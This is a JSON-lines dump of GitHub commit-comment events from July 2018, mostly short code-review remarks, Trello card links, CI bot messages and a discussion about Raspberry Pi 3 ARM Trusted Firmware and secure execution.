{"id":"8019071472","type":"CommitCommentEvent","actor":{"login":"andreiw"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29835635,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T21:14:24Z","updated_at":"2018-07-25T21:14:24Z","author_association":"OWNER","body":"Hi,\n\nThanks, an open alternative to bootcode.bin would be wonderful. For me, I want working framebuffer in UEFI and working VC drivers in 64-bit Windows/Linux (esp. once I get 32-bit Raspbian booting). There’s a lot of code that people have written that relies on the mailbox interfaces, and personally I am not that interested in spending my time REing the Pi in my spare time.\n\nYou’re correct in identifying the platform limitations, but ATF on the Pi exists solely to implement PSCI (for AP bring-up, reboot, etc). There are no “secure payloads”. This allows “almost” approaching SBBR compatibility. For others, even a crippled ATF may provide enough to tinker with the ATF code itself. A $20 platform, regardless of its limitations, still holds developer value, which is why I have been fleshing out UEFI support...\n\nA\n\n> On Jul 25, 2018, at 1:48 AM, Kristina Brooks <notifications@github.com> wrote:\n> \n> There's a toolchain and a firmware that does what bootcode.bin does, you can chainload start.elf after executing your own code or you can just patch it. The firmware isn't an issue per se, it's not a doorstop, the hardware is fairly well understood by a couple of people, is documented and there's a nice IDA plugin for it if you want to RE it. And currently BCM is not shipping them with \"force bootcode.bin sigchecking\" OTP fuse blown, so I don't see how it's a doorstop, a large chunk of the hard work has already been done for you.\n> \n> Why ATF though? The \"trusted\" part is not something that you can provide because of hardware limitations, and I'll explain.\n> \n> I do not believe it is physically possible to securely execute on RPi3, you don't have a GIC and the async bridge between the system bus and the hacked on ARM code forces all ARM accesses to appear as insecure. The security extensions are entirely for VPU's use, and are of little to no use to ARM aside from having another exception level, but what's the point when you are just able to patch the exception handler of the secure code (since you lack any way to protect memory regions from ARM's point of view aka TZPCs). So yes you start in EL3 but unless it's for debugging it's kinda useless. Anything you do from the VPU short of some serious emulation over the software debugging interface or some other hack will still not get ARM to appear as secure.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-25T21:14:24Z"}
{"id":"8019072696","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835638,"position":null,"line":null,"path":null,"commit_id":"5c164e3bab9f8cac91c40428362392965492c314","created_at":"2018-07-25T21:14:42Z","updated_at":"2018-07-25T21:14:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Project setup](https://trello.com/c/99rziu29/3-project-setup)"}},"created_at":"2018-07-25T21:14:42Z"}
{"id":"8019074639","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29835640,"position":5,"line":37,"path":"src/formatter/config/WhitespaceConfig.hx","commit_id":"2352070d616c080a164cb953a1483499a1b5b8f1","created_at":"2018-07-25T21:15:06Z","updated_at":"2018-07-25T21:15:06Z","author_association":"MEMBER","body":"I highly doubt they're going to add a _third_ fucntion type syntax. :)"}},"created_at":"2018-07-25T21:15:06Z"}
{"id":"8019076419","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835643,"position":null,"line":null,"path":null,"commit_id":"d2760176e28af0d9671469705208e4537092c15d","created_at":"2018-07-25T21:15:28Z","updated_at":"2018-07-25T21:15:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Project setup](https://trello.com/c/99rziu29/3-project-setup)"}},"created_at":"2018-07-25T21:15:28Z"}
{"id":"8019076468","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835644,"position":null,"line":null,"path":null,"commit_id":"eb6d725462050d998417b59e6f3f66bf7e938c80","created_at":"2018-07-25T21:15:28Z","updated_at":"2018-07-25T21:15:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Project setup](https://trello.com/c/99rziu29/3-project-setup)"}},"created_at":"2018-07-25T21:15:28Z"}
{"id":"8019076781","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835645,"position":null,"line":null,"path":null,"commit_id":"8bda749c697b5940dbb4dcc80beb50acaf854645","created_at":"2018-07-25T21:15:32Z","updated_at":"2018-07-25T21:15:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Project setup](https://trello.com/c/99rziu29/3-project-setup)"}},"created_at":"2018-07-25T21:15:32Z"}
{"id":"8019077145","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835646,"position":null,"line":null,"path":null,"commit_id":"7c6a0ef9a9628de155f93750eff97ced4108d553","created_at":"2018-07-25T21:15:37Z","updated_at":"2018-07-25T21:15:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Project setup](https://trello.com/c/99rziu29/3-project-setup)"}},"created_at":"2018-07-25T21:15:37Z"}
{"id":"8019077431","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29835648,"position":null,"line":null,"path":null,"commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-25T21:15:40Z","updated_at":"2018-07-25T21:15:40Z","author_association":"OWNER","body":"One easy way to fix it is by putting the velocity = accel * dt at the top. (You'll need to keep track of `last_run_time` as well.)\n\n```\nif first_run:\n    last_run_time = time()\n\ncurr_time = time()\ndt = curr_time - last_run_time\nlast_run_time = curr_time\n\nvelocity += dt*accel\n\nif distance < 1.0:\n    return\n\n...\n```"}},"created_at":"2018-07-25T21:15:40Z"}
{"id":"8019077863","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835650,"position":null,"line":null,"path":null,"commit_id":"19a2d1e37dbff4ea3422114dba884a08154aa94d","created_at":"2018-07-25T21:15:46Z","updated_at":"2018-07-25T21:15:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GET request to find a user by id](https://trello.com/c/zK0DCe9y/5-get-request-to-find-a-user-by-id)"}},"created_at":"2018-07-25T21:15:46Z"}
{"id":"8019079027","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835651,"position":null,"line":null,"path":null,"commit_id":"8c3a476f7840e4015c9d708984b6517589934ffc","created_at":"2018-07-25T21:16:01Z","updated_at":"2018-07-25T21:16:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Able to make a GET request to find all users](https://trello.com/c/06fkmJxO/4-able-to-make-a-get-request-to-find-all-users)"}},"created_at":"2018-07-25T21:16:01Z"}
{"id":"8019079551","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Blog"},"payload":{"comment":{"id":29835653,"position":null,"line":null,"path":null,"commit_id":"70f4dedae1c804fcb6d3b1a3116c1651dcf87f28","created_at":"2018-07-25T21:16:09Z","updated_at":"2018-07-25T21:16:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make a post request for new user](https://trello.com/c/77aHYhta/6-make-a-post-request-for-new-user)"}},"created_at":"2018-07-25T21:16:09Z"}
{"id":"8019090154","type":"CommitCommentEvent","actor":{"login":"Alino"},"repo":{"name":"GALAglobal/TAPICC-API-implementation"},"payload":{"comment":{"id":29835664,"position":null,"line":null,"path":null,"commit_id":"f3fa53ad986aba8d52e1b8c8c152e4be834c3ecf","created_at":"2018-07-25T21:18:33Z","updated_at":"2018-07-25T21:18:33Z","author_association":"COLLABORATOR","body":"closes #21"}},"created_at":"2018-07-25T21:18:33Z"}
{"id":"8019093372","type":"CommitCommentEvent","actor":{"login":"mwgh"},"repo":{"name":"mwgh/cmpt276_project_gr14"},"payload":{"comment":{"id":29835672,"position":null,"line":null,"path":null,"commit_id":"6f15fffa71d6e7226b9ab64d19509bd2b65f9b1a","created_at":"2018-07-25T21:19:16Z","updated_at":"2018-07-25T21:19:16Z","author_association":"OWNER","body":"It should be in DataSource, not delegate (why it doesn't work)"}},"created_at":"2018-07-25T21:19:16Z"}
{"id":"8019094526","type":"CommitCommentEvent","actor":{"login":"LightVillet"},"repo":{"name":"LightVillet/Gelik"},"payload":{"comment":{"id":29835675,"position":null,"line":null,"path":null,"commit_id":"a4dee264775fbf92e659c864759ef68780ee28b7","created_at":"2018-07-25T21:19:31Z","updated_at":"2018-07-25T21:19:31Z","author_association":"OWNER","body":"Good and Tasty! "}},"created_at":"2018-07-25T21:19:31Z"}
{"id":"8019095730","type":"CommitCommentEvent","actor":{"login":"cgvirus"},"repo":{"name":"NatronGitHub/NatronGitHub.github.io"},"payload":{"comment":{"id":29835679,"position":null,"line":null,"path":null,"commit_id":"a480da080e7372066ae84746ab1a8763157dbe91","created_at":"2018-07-25T21:19:47Z","updated_at":"2018-07-25T21:19:47Z","author_association":"CONTRIBUTOR","body":"Please wait for a moment. Have not seen these massive changes! Going to back it up to previous state."}},"created_at":"2018-07-25T21:19:47Z"}
{"id":"8019095798","type":"CommitCommentEvent","actor":{"login":"reichlj"},"repo":{"name":"reichlj/NumerikFuerIngenieure"},"payload":{"comment":{"id":29835680,"position":null,"line":null,"path":null,"commit_id":"e07f8d0efaa293633957a1ab0d2329d890837262","created_at":"2018-07-25T21:19:48Z","updated_at":"2018-07-25T21:19:48Z","author_association":"OWNER","body":"Files Ende Sommersemester 2018"}},"created_at":"2018-07-25T21:19:48Z"}
{"id":"8019100123","type":"CommitCommentEvent","actor":{"login":"drewjenkins"},"repo":{"name":"Quiq/stubborn-fetch"},"payload":{"comment":{"id":29835688,"position":6,"line":6,"path":"src/error.js","commit_id":"bf96aa2b4dac3ec74dc253dadffbb7da03df928f","created_at":"2018-07-25T21:20:45Z","updated_at":"2018-07-25T21:20:45Z","author_association":"MEMBER","body":"may be more consistent to just call this `request`, since we are using `response`"}},"created_at":"2018-07-25T21:20:45Z"}
{"id":"8019105377","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29835692,"position":null,"line":null,"path":null,"commit_id":"a44a9fdad612aff807239cd72eb765a6f6350b1b","created_at":"2018-07-25T21:21:56Z","updated_at":"2018-07-25T21:21:56Z","author_association":"CONTRIBUTOR","body":"PR to delete it here: https://github.com/NixOS/nixpkgs/pull/44109"}},"created_at":"2018-07-25T21:21:56Z"}
{"id":"8019105595","type":"CommitCommentEvent","actor":{"login":"reichlj"},"repo":{"name":"reichlj/NumerikFuerIngenieure"},"payload":{"comment":{"id":29835693,"position":null,"line":null,"path":null,"commit_id":"e07f8d0efaa293633957a1ab0d2329d890837262","created_at":"2018-07-25T21:21:59Z","updated_at":"2018-07-25T21:21:59Z","author_association":"OWNER","body":"Files Ende Sommersemester 2018"}},"created_at":"2018-07-25T21:21:59Z"}
{"id":"8019110055","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29835701,"position":null,"line":null,"path":null,"commit_id":"59718fca1b405227a2793e2d77db1896dba76424","created_at":"2018-07-25T21:22:59Z","updated_at":"2018-07-25T21:22:59Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-46](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T21:22:59Z"}
{"id":"8019141308","type":"CommitCommentEvent","actor":{"login":"andreiw"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29835776,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T21:29:54Z","updated_at":"2018-07-25T21:29:54Z","author_association":"OWNER","body":"Yes, it’s not possible to execute securely on the Arm cores on the Pi. Anyone attempting to is going to be sorely disappointed or at worst is a quack."}},"created_at":"2018-07-25T21:29:54Z"}
{"id":"8019150436","type":"CommitCommentEvent","actor":{"login":"creachadair"},"repo":{"name":"google/kythe"},"payload":{"comment":{"id":29835795,"position":4,"line":231,"path":"kythe/go/test/testutil/testutil.go","commit_id":"37318c76aa3603a445a8b8394269e4e1a366cdb4","created_at":"2018-07-25T21:31:54Z","updated_at":"2018-07-25T21:31:54Z","author_association":"CONTRIBUTOR","body":"At the top of the function, actually, would be better."}},"created_at":"2018-07-25T21:31:54Z"}
{"id":"8019152235","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/BasicCommands"},"payload":{"comment":{"id":29835798,"position":null,"line":null,"path":null,"commit_id":"79fbee0dd72b61aeadd9bd3e08d26764ff9518a1","created_at":"2018-07-25T21:32:20Z","updated_at":"2018-07-25T21:32:20Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: mapping values are not allowed in this context\n(line 7, column 9) in /poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/BasicCommands/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `34faf248-9052-11e8-8131-7488680e0644`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T21:32:20Z"}
{"id":"8019156543","type":"CommitCommentEvent","actor":{"login":"nikglavin"},"repo":{"name":"braintree/braintree-web"},"payload":{"comment":{"id":29835807,"position":5,"line":5,"path":"src/hosted-fields/shared/get-card-types.js","commit_id":"330bd06d53be4fb8fc9aa51c4f0c19631c3af69e","created_at":"2018-07-25T21:33:17Z","updated_at":"2018-07-25T21:33:17Z","author_association":"NONE","body":"What is the purpose of this ? as it is run when the module is loaded webpack builds with (HMR) keep throwing Error: \"mir\" is not a supported card type"}},"created_at":"2018-07-25T21:33:17Z"}
{"id":"8019158459","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29835809,"position":null,"line":null,"path":null,"commit_id":"71df55f272d9a860af96eb60dd0cd9ef97b814e9","created_at":"2018-07-25T21:33:42Z","updated_at":"2018-07-25T21:33:42Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3408orgst](https://3408orgst-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/organization-dashboard](https://3408orgst-static-docs.pantheonsite.io/docs/organization-dashboard)\n- [/docs/organizations](https://3408orgst-static-docs.pantheonsite.io/docs/organizations)\n"}},"created_at":"2018-07-25T21:33:42Z"}
{"id":"8019162334","type":"CommitCommentEvent","actor":{"login":"andreiw"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29835815,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T21:34:33Z","updated_at":"2018-07-25T21:34:33Z","author_association":"OWNER","body":"@satmandu I reread your comment a few times but I don’t understand what you’re getting at or what you’re proposing. If you want to build a commercial solution relying on trusted/secure boot, there are plenty of SoC vendors to choose from, in a wide range of functionality. Marvell Armada and Cavium Octeon TX are just two of the fine options I am familiar with myself, and those are available as SBSA and SBBR-compliant systems.\r\n\r\nThis ATF implementation is a building block of https://github.com/andreiw/RaspberryPiPkg. No more, no less."}},"created_at":"2018-07-25T21:34:33Z"}
{"id":"8019164602","type":"CommitCommentEvent","actor":{"login":"nthomas123"},"repo":{"name":"nthomas123/Noble-Portfolio"},"payload":{"comment":{"id":29835821,"position":null,"line":null,"path":null,"commit_id":"d0d6f7124a041d96340afb67be5f8cf58af56fd1","created_at":"2018-07-25T21:35:03Z","updated_at":"2018-07-25T21:35:03Z","author_association":"OWNER","body":"deleted"}},"created_at":"2018-07-25T21:35:03Z"}
{"id":"8019169202","type":"CommitCommentEvent","actor":{"login":"interduo"},"repo":{"name":"mklopotek/gamesnake"},"payload":{"comment":{"id":29835831,"position":null,"line":null,"path":null,"commit_id":"e42d3cb71efa4644b29d45e6c369f7adc77f71ac","created_at":"2018-07-25T21:36:06Z","updated_at":"2018-07-25T21:36:06Z","author_association":"NONE","body":"Thanks for the commit. I really apreciate Your work. \r\nIf there is a posibility please give me link to online demo.\r\n:)"}},"created_at":"2018-07-25T21:36:06Z"}
{"id":"8019169644","type":"CommitCommentEvent","actor":{"login":"JonyHuergo"},"repo":{"name":"JonyHuergo/ProyectoIntegrador-Laravel-"},"payload":{"comment":{"id":29835835,"position":null,"line":null,"path":null,"commit_id":"2a3e5c0d44d143245944dcc6ac43198a9f692d29","created_at":"2018-07-25T21:36:12Z","updated_at":"2018-07-25T21:36:12Z","author_association":"OWNER","body":"Que capo que sos Lucas"}},"created_at":"2018-07-25T21:36:12Z"}
{"id":"8019170097","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29835836,"position":null,"line":null,"path":null,"commit_id":"a44a9fdad612aff807239cd72eb765a6f6350b1b","created_at":"2018-07-25T21:36:19Z","updated_at":"2018-07-25T21:36:19Z","author_association":"CONTRIBUTOR","body":"Merged"}},"created_at":"2018-07-25T21:36:19Z"}
{"id":"8019170674","type":"CommitCommentEvent","actor":{"login":"danielmoy-google"},"repo":{"name":"google/kythe"},"payload":{"comment":{"id":29835838,"position":4,"line":231,"path":"kythe/go/test/testutil/testutil.go","commit_id":"37318c76aa3603a445a8b8394269e4e1a366cdb4","created_at":"2018-07-25T21:36:26Z","updated_at":"2018-07-25T21:36:26Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-25T21:36:26Z"}
{"id":"8019170695","type":"CommitCommentEvent","actor":{"login":"leanguardia"},"repo":{"name":"TEDxUCBCBA/TedXWebPage"},"payload":{"comment":{"id":29835839,"position":6,"line":13,"path":"public/index.html","commit_id":"abf920cf43a70acedeb1d20b1af0f3cb7d17dbd6","created_at":"2018-07-25T21:36:26Z","updated_at":"2018-07-25T21:36:26Z","author_association":"CONTRIBUTOR","body":"Rodri, este script podría estar en la sección de script tags, más abajo?? ⬇️ (ref. el comentario de abajo)"}},"created_at":"2018-07-25T21:36:26Z"}
{"id":"8019170798","type":"CommitCommentEvent","actor":{"login":"barsquiggle"},"repo":{"name":"matthew-robertson/vore-tracker"},"payload":{"comment":{"id":29835840,"position":null,"line":null,"path":null,"commit_id":"5a01b82e8363188edca84beda605523cd74b816e","created_at":"2018-07-25T21:36:27Z","updated_at":"2018-07-25T21:36:27Z","author_association":"NONE","body":"Hey! I'm running this on my own PC, and the ! commands seem to be working just fine (the bot sends a response in the discord server), but whenever the forbidden word is actually mentioned, the bot does not send a message to the server! Thanks."}},"created_at":"2018-07-25T21:36:27Z"}
{"id":"8019170935","type":"CommitCommentEvent","actor":{"login":"leanguardia"},"repo":{"name":"TEDxUCBCBA/TedXWebPage"},"payload":{"comment":{"id":29835842,"position":null,"line":null,"path":null,"commit_id":"abf920cf43a70acedeb1d20b1af0f3cb7d17dbd6","created_at":"2018-07-25T21:36:29Z","updated_at":"2018-07-25T21:36:29Z","author_association":"CONTRIBUTOR","body":"Aqui? :P "}},"created_at":"2018-07-25T21:36:29Z"}
{"id":"8019173362","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29835848,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-25T21:37:01Z","updated_at":"2018-07-25T21:37:01Z","author_association":"COLLABORATOR","body":"cc @rajkumarkarthik"}},"created_at":"2018-07-25T21:37:01Z"}
{"id":"8019173456","type":"CommitCommentEvent","actor":{"login":"micah-prime"},"repo":{"name":"USDA-ARS-NWRC/awsm"},"payload":{"comment":{"id":29835849,"position":null,"line":null,"path":null,"commit_id":"72ff37c641aba9963c2000d9457a5d6002f5a10e","created_at":"2018-07-25T21:37:03Z","updated_at":"2018-07-25T21:37:03Z","author_association":"CONTRIBUTOR","body":"Closes issue #30 "}},"created_at":"2018-07-25T21:37:03Z"}
{"id":"8019173560","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29835850,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-25T21:37:05Z","updated_at":"2018-07-25T21:37:05Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-25T21:37:05Z"}
{"id":"8019175308","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"braintree/braintree-web"},"payload":{"comment":{"id":29835853,"position":5,"line":5,"path":"src/hosted-fields/shared/get-card-types.js","commit_id":"330bd06d53be4fb8fc9aa51c4f0c19631c3af69e","created_at":"2018-07-25T21:37:30Z","updated_at":"2018-07-25T21:37:30Z","author_association":"NONE","body":"Our open source [Credit Card Type module](https://github.com/braintree/credit-card-type) added support for MIR cards, but Braintree does not support MIR cards, so we remove that from even being an option to show.\r\n\r\nIt's strange that you're getting an error. Please contact our support team so we can more easily troubleshoot issues with your integration. https://articles.braintreepayments.com/forms/contact"}},"created_at":"2018-07-25T21:37:30Z"}
{"id":"8019176622","type":"CommitCommentEvent","actor":{"login":"leanguardia"},"repo":{"name":"TEDxUCBCBA/TedXWebPage"},"payload":{"comment":{"id":29835856,"position":6,"line":13,"path":"public/index.html","commit_id":"abf920cf43a70acedeb1d20b1af0f3cb7d17dbd6","created_at":"2018-07-25T21:37:50Z","updated_at":"2018-07-25T21:37:50Z","author_association":"CONTRIBUTOR","body":"@whiletruedothis "}},"created_at":"2018-07-25T21:37:50Z"}
{"id":"8019181331","type":"CommitCommentEvent","actor":{"login":"chrislun16"},"repo":{"name":"socialImpactApp/SIAppInitial"},"payload":{"comment":{"id":29835864,"position":null,"line":null,"path":null,"commit_id":"45e0145f7bc59ee81d9ce210f476a9ab8ac0d624","created_at":"2018-07-25T21:38:51Z","updated_at":"2018-07-25T21:38:51Z","author_association":"CONTRIBUTOR","body":"@morganhowell95 \r\nWhen you get a chance, can you review my commit? In particular the VolunteerOpportunityCell.m and the savedViewController.m? Thanks"}},"created_at":"2018-07-25T21:38:51Z"}
{"id":"8019188812","type":"CommitCommentEvent","actor":{"login":"patrickrfisher"},"repo":{"name":"patrickrfisher/forms-practice"},"payload":{"comment":{"id":29835881,"position":null,"line":null,"path":null,"commit_id":"81e637a95b96b464e2f6128e3ac8da45ae082c1e","created_at":"2018-07-25T21:40:34Z","updated_at":"2018-07-25T21:40:34Z","author_association":"OWNER","body":"updated action"}},"created_at":"2018-07-25T21:40:34Z"}
{"id":"8019193436","type":"CommitCommentEvent","actor":{"login":"anselmbradford"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":29835887,"position":null,"line":null,"path":null,"commit_id":"551335eedf62261299af7aafdfc896b3aef8de67","created_at":"2018-07-25T21:41:34Z","updated_at":"2018-07-25T21:41:34Z","author_association":"CONTRIBUTOR","body":"@ReneKriest @michaelficarra Why is `{}.hasOwnProperty.call(foo, key)` preferable to `foo.hasOwnProperty(key)`? Does it avoid searching for `hasOwnProperty` up the prototype chain?"}},"created_at":"2018-07-25T21:41:34Z"}
{"id":"8019200660","type":"CommitCommentEvent","actor":{"login":"kkhatua"},"repo":{"name":"apache/drill"},"payload":{"comment":{"id":29835904,"position":null,"line":null,"path":null,"commit_id":"9d86cb53f33b51acbe17bcd9f404e75161aef913","created_at":"2018-07-25T21:43:16Z","updated_at":"2018-07-25T21:43:16Z","author_association":"CONTRIBUTOR","body":"Shouldn't all commits be carrying a JIRA ID?"}},"created_at":"2018-07-25T21:43:16Z"}
{"id":"8019204441","type":"CommitCommentEvent","actor":{"login":"PotionSell"},"repo":{"name":"PotionSell/ALFA"},"payload":{"comment":{"id":29835916,"position":null,"line":null,"path":null,"commit_id":"192b0e0c56f07f4bad6f5c2dc1c89de80789a974","created_at":"2018-07-25T21:44:08Z","updated_at":"2018-07-25T21:44:08Z","author_association":"OWNER","body":"Customized catalog for the SFACT project."}},"created_at":"2018-07-25T21:44:08Z"}
{"id":"8019211955","type":"CommitCommentEvent","actor":{"login":"kevmoo"},"repo":{"name":"dart-lang/pub_semver"},"payload":{"comment":{"id":29835939,"position":6,"line":6,"path":".travis.yml","commit_id":"7b2549d1f57d9311f5525c761ce7627bdb6e6d27","created_at":"2018-07-25T21:45:57Z","updated_at":"2018-07-25T21:45:57Z","author_association":"MEMBER","body":"`stable` handles 1.24.3 now.\n\nWe can decide once stable flips to dart2 if we want to add back `1.24.3`\n\nOn Wed, Jul 25, 2018 at 2:41 PM Patrice Chalin <notifications@github.com>\nwrote:\n\n> To be clear, this should be changed to 1.24.3, right? (Since this\n> package's SDK contraints include 1.x.)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dart-lang/pub_semver/commit/7b2549d1f57d9311f5525c761ce7627bdb6e6d27#commitcomment-29835890>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AABCioNW4RqiFIGCBpIvt0XB99LdtO4mks5uKOYggaJpZM4VP6em>\n> .\n>\n"}},"created_at":"2018-07-25T21:45:57Z"}
{"id":"8019216268","type":"CommitCommentEvent","actor":{"login":"EvanPurkhiser"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":29835947,"position":5,"line":54,"path":"src/sentry/static/sentry/app/components/feature.jsx","commit_id":"7f34fbded22a4488c785b0629e26ebfb337fbbc9","created_at":"2018-07-25T21:46:58Z","updated_at":"2018-07-25T21:46:58Z","author_association":"MEMBER","body":"Would a better comment be \"OR true to disable a generic 'coming soon' message\""}},"created_at":"2018-07-25T21:46:58Z"}
{"id":"8019217590","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29835951,"position":2,"line":2,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:47:16Z","updated_at":"2018-07-25T21:47:16Z","author_association":"OWNER","body":"Function names that return boolean values (true/false) should be named is_x\r\nThis should be `is_divisible`\r\nWe do this because then \r\n`if is_divisible(number):` is an intuitive term"}},"created_at":"2018-07-25T21:47:16Z"}
{"id":"8019219692","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29835953,"position":3,"line":3,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:47:47Z","updated_at":"2018-07-25T21:47:47Z","author_association":"OWNER","body":"This is a stylistic thing, but comments should be reserved for complex functions that are not obvious. This is not one of those functions."}},"created_at":"2018-07-25T21:47:47Z"}
{"id":"8019220643","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29835954,"position":null,"line":null,"path":null,"commit_id":"50f1b5f92a0bb121d4424f626768a1ff6dc2e142","created_at":"2018-07-25T21:48:01Z","updated_at":"2018-07-25T21:48:01Z","author_association":"MEMBER","body":"#47 "}},"created_at":"2018-07-25T21:48:01Z"}
{"id":"8019223373","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29835961,"position":18,"line":18,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:48:41Z","updated_at":"2018-07-25T21:48:41Z","author_association":"OWNER","body":"this can be a one-line function\r\nreturn a % b == 0"}},"created_at":"2018-07-25T21:48:41Z"}
{"id":"8019224970","type":"CommitCommentEvent","actor":{"login":"atlee731"},"repo":{"name":"atlee731/42SiliconValley"},"payload":{"comment":{"id":29835964,"position":null,"line":null,"path":null,"commit_id":"22ee794fcd3f23f7b235790b151dd3968f3965f2","created_at":"2018-07-25T21:49:04Z","updated_at":"2018-07-25T21:49:04Z","author_association":"OWNER","body":"#include <stdio.h>\r\n\r\nint    ft_putchar ( char c ) {\r\n    write(1, &c, 1);\r\n    return 0;\r\n\r\n}\r\n\r\n\r\nint main (void)\r\n {\r\n     char count;\r\n     \r\n     count = 'z';\r\n     \r\n     while (count >= 'a') {\r\n//        printf(\"%c\",count);\r\n        ft_putchar(count);\r\n        count--;\r\n    }\r\n    return 0;\r\n }\r\n"}},"created_at":"2018-07-25T21:49:04Z"}
